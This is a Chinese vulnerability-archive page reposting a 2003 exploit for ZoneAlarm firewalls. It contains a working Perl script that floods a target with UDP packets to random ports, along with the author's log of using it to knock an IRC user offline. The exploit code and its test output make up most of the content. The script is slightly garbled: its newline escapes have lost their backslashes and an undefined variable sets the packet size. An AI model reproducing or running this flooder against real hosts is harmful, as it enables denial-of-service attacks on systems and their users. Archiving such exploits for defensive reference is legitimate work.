ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 – Random UDP Flood Denial of Service (1)
漏洞ID | 1054141 | 漏洞类型 | |
发布时间 | 2003-09-02 | 更新时间 | 2003-09-02 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8525/info
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software.
# Overview :
#
# ZoneAlarm is a firewall software
# package designed for Microsoft Windows
# operating systems that blocks intrusion
# attempts, trusted by millions, and has
# advanced privacy features like worms,
# Trojan horses, and spyware protection.
# ZoneAlarm is distributed and maintained
# by Zone Labs.http://www.zonelabs.com
#
# Details :
#
# ZoneAlarm was found vulnerable to a
# serious vulnerability leading to a
# remote Denial Of Service condition due
# to failure to handle udp random
# packets, if an attacker sends multiple
# udp packets to multiple ports 0-65000,
# the machine will hang up until the
# attacker stop flooding.
#
# The following is a remote test done
# under ZoneAlarm version 3.7.202 running
# on windows xp home edition.
#
# on irc test1 joined running ZoneAlarm
# version 3.7.202 with default
# installation
#
# * test1 ([email protected].***.**) has joined #Hackology
#
# from a linux box :
#
# [root@mail DoS]# ping 62.251.***.**
# PING 62.251.***.** (62.251.***.**) from
# ***.***.**.** : 56(84) bytes of data.
#
# --- 62.251.***.** ping statistics ---
# 7 packets transmitted, 0 received, 100%
# loss, time 6017ms
#
# on irc
#
# -> [test1] PING
#
# [test1 PING reply]: 1secs
#
# Host is firewalled and up
#
# now lets try to dos
#
# --- ZoneAlarm Remote DoS Xploit
# ---
# --- Discovered & Coded By _6mO_HaCk
#
# [*] DoSing 62.251.***.** ... wait 1
# minute and then CTRL+C to stop
#
# [root@mail DoS]#
#
# after 2 minutes
#
# * test1 ([email protected].***.**) Quit (Ping timeout)
#
# I have made the same test on ZoneAlarm
# Pro 4.0 Release running on windows xp
# professional and i've got the same
# result.
#
# Exploit released : 02/09/03
#
# Vulnerable Versions : ALL
#
# Operating Systems : ALL Windows
#
# Successfully Tested on :
#
# ZoneAlarm version 3.7.202 / windows xp
# home edition / windows 98.
#
# ZoneAlarm Pro 4.0 Release / windows xp
# professional
#
# Vendor status : UNKOWN
#
# Solution : Shut down ZoneAlarm and wait
# for an update.
#
# The following is a simple code written
# in perl to demonstrate that, the code
# is clean, it wont eat your cpu usage
# and it doesnt need to be run as root
# but you still have to use it at your
# own risk and on your own machine or
# remotly after you get permission.
#
# Big thanx go to D|NOOO and frost for
# providing me windows boxes with
# zonealarm for testing
#
# Greetz to ir7ioli, BlooDMASK
# [email protected]
# NRGY, Le_Ro| JT ghosted_ Securma,
# anasoft SySiPh, phrack, DeV|L0Ty,
# MajNouN |BiG-LuV| h4ckg1rl and all
# my ppl here in Chicago and in Morocco
#
# Comments suggestions or additional info
# feel free to contact me at
# [email protected]
# [email protected]
#!/usr/bin/perl
use Socket;
system(clear);
print "n";
print "--- ZoneAlarm Remote DoS Xploitn";
print "---n";
print "--- Discovered & Coded By _6mO_HaCkn";
print "n";
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stopn";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("nn[*] Usage : perl $0 <Target>nn");}
相关推荐: BlazeBoard Information Disclosure Vulnerability
BlazeBoard Information Disclosure Vulnerability 漏洞ID 1099850 漏洞类型 Access Validation Error 发布时间 2003-07-14 更新时间 2003-07-14 CVE编号 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666